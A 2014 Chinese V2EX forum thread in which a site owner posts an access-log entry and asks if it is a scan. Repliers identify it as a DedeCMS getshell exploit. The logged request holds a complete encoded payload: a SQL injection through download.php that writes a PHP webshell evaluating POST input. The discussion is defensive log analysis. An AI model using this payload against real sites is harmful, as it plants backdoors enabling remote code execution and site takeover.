V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Execution
V2EX  ›  问与答

求分析这段 web 日志,这是在扫描我的站点漏洞吗?

  •  
  •   Execution · 2014-12-10 18:24:11 +08:00 · 3137 次点击
    这是一个创建于 3671 天前的主题,其中的信息可能已经有所发展或是发生改变。
    今天上午发现网站挂了,间歇性的打不开。出现了许多类是这段代码的 get 或 post 日志代码,请问它这是在干嘛?为了安全起见,目前已经屏蔽了该ip。

    125.78.154.214 - - [10/Dec/2014:03:18:00 +0800] "GET /plus/download.php?open=1&c=d&arrs1[]=99&a=b&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=108&arrs2[]=97&arrs2[]=111&arrs2[]=98&arrs2[]=105&arrs2[]=97&arrs2[]=111&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=70&arrs2[]=117&arrs2[]=99&arrs2[]=75&arrs2[]=83&arrs2[]=97&arrs2[]=102&arrs2[]=101&arrs2[]=100&arrs2[]=111&arrs2[]=103&arrs2[]=88&arrs2[]=61&arrs2[]=98&arrs2[]=97&arrs2[]=115&arrs2[]=101&arrs2[]=54&arrs2[]=52&arrs2[]=95&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=111&arrs2[]=100&arrs2[]=101&arrs2[]=59&arrs2[]=36&arrs2[]=106&arrs2[]=99&arrs2[]=61&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=59&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=106&arrs2[]=99&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=120&arrs2[]=120&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=51&arrs2[]=32&arrs2[]=35 HTTP/1.0" 404 1879
    8 条回复    2014-12-10 18:30:42 +08:00
    lincanbin
        1
    lincanbin  
       2014-12-10 18:26:28 +08:00   ❤️ 1
    没有,只是在发送两个List。
    网站打不开如果不是请求太频繁了,就是程序写得太烂,没有对不合法参数进行预判断就执行也不break。
    hicdn
        2
    hicdn  
       2014-12-10 18:26:55 +08:00   ❤️ 1
    这个不是在扫描,这是攻击 DedeCMS 的代码,
    Execution
        3
    Execution  
    OP
       2014-12-10 18:27:14 +08:00
    还有如何判断它有没有注入漏洞成功?我有没有中招啊?现在有点不放心了。
    Execution
        4
    Execution  
    OP
       2014-12-10 18:27:47 +08:00
    @lincanbin 谢谢 了
    Execution
        5
    Execution  
    OP
       2014-12-10 18:27:59 +08:00
    @hicdn 谢谢
    virusdefender
        6
    virusdefender  
       2014-12-10 18:28:04 +08:00
    dedecms getshell exp
    virusdefender
        7
    virusdefender  
       2014-12-10 18:28:36 +08:00
    @virusdefender 如果你的网站不是dede的就没事~
    Execution
        8
    Execution  
    OP
       2014-12-10 18:30:42 +08:00
    @virusdefender 不是dede,这下放心了 ,谢谢兄弟 !
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2575 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 05:37 · PVG 13:37 · LAX 21:37 · JFK 00:37
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.